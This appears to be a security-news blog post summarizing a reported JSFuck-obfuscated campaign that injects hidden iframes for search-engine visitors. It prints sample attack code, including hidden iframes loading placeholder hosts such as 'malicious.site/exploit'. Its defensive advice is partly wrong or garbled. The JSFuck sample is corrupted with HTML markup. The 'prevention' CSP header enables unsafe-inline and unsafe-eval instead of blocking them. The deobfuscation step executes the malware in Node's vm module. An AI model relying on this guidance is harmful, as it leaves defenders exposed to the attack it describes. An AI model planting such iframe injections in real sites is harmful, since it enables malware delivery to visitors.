JSFck Malware Campaign: Obfuscation and Redirection Tactics

By /

Listen to this Post

Featured Image

Introduction

JSFck is an esoteric subset of JavaScript that uses only six characters ([, ], (, ), !, and +) to execute arbitrary code. Palo Alto Networks Unit 42 researchers uncovered a widespread campaign leveraging JSFck obfuscation to evade detection while injecting malicious iframes. The malware checks for search engine referrers before redirecting victims to malvertising or payload delivery sites.

Learning Objectives

  • Understand how JSFck obfuscation bypasses traditional detection methods.
  • Analyze the malware’s redirection mechanism via injected iframes.
  • Learn defensive techniques to detect and mitigate such attacks.

You Should Know

1. JSFck Obfuscation Basics

Example Snippet:

[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]<a href="(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]">([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]</a>()

Step-by-Step Explanation:

  1. Purpose: The above snippet is a JSFck-encoded “Hello, World!” equivalent. Attackers use similar patterns to hide malicious logic.
  2. How It Works: JSFck exploits JavaScript’s type coercion to construct strings, functions, and payloads using minimal characters.
  3. Detection: Use tools like Node.js `vm` module or browser developer tools to deobfuscate dynamically.

2. Detecting Search Engine Referrer Abuse

Example Snippet (Malware Check):

if (document.referrer.indexOf("google.com") > -1 || document.referrer.indexOf("bing.com") > -1) { 
document.body.innerHTML += "

<iframe src='malware.site' style='display:none;'></iframe>

"; 
}

Step-by-Step Mitigation:

  1. Monitor Referrers: Use WAF rules (e.g., Cloudflare or ModSecurity) to block suspicious referrer patterns.

2. Content Security Policy (CSP):

Content-Security-Policy: frame-ancestors 'none'; default-src 'self'

3. Browser Extensions: Deploy NoScript or uMatrix to block unauthorized iframes.

3. Analyzing Malicious Iframe Injection

Example Snippet (Dynamic Iframe):

var iframe = document.createElement('iframe'); 
iframe.src = "https://malicious.site/exploit"; 
iframe.style.display = "none"; 
document.body.appendChild(iframe);

Step-by-Step Analysis:

  1. Inspection: Use Chrome DevTools (Elements tab) to detect hidden iframes.
  2. Blocking: Configure AdBlock Plus or uBlock Origin to filter known malicious domains.
  3. Logging: Server-side logging of iframe loads via Nginx/Apache access logs.

4. Deobfuscating JSFck with Node.js

Command:

node -e "console.log(require('vm').runInNewContext('[bash]'))"

Steps:

  1. Save the obfuscated code to a file (malware.js).

2. Run:

node -e "console.log(require('vm').runInNewContext(require('fs').readFileSync('malware.js', 'utf8')))"

3. Output: Decoded JavaScript logic.

5. Preventing JSFck Execution

Mitigation Techniques:

1. CSP Header:

Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval';

2. WAF Rules: Block scripts with excessive [, (, !, or `+` characters.
3. Static Analysis: Use ESLint with custom rules to flag JSFck patterns.

What Undercode Say

  • Key Takeaway 1: JSFck’s minimalistic obfuscation makes it a potent evasion tool, but dynamic analysis defeats it.
  • Key Takeaway 2: Referrer-based attacks exploit trust in search engines—implement CSP and WAF rules to disrupt the kill chain.

Analysis:

The campaign highlights attackers’ shift toward “low-character” obfuscation to bypass regex-based detection. Future variants may combine JSFck with WebAssembly (WASM) for further stealth. Defenders must prioritize runtime analysis over static signatures and adopt zero-trust policies for third-party scripts.

Prediction

JSFck’s abuse will grow as attackers target SMBs with limited security tooling. Automated deobfuscation tools and AI-driven anomaly detection (e.g., Darktrace) will become critical to counter these threats.

Reference: Palo Alto Networks Unit 42 Report

IT/Security Reporter URL:

Reported By: Unit42 Esoteric – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: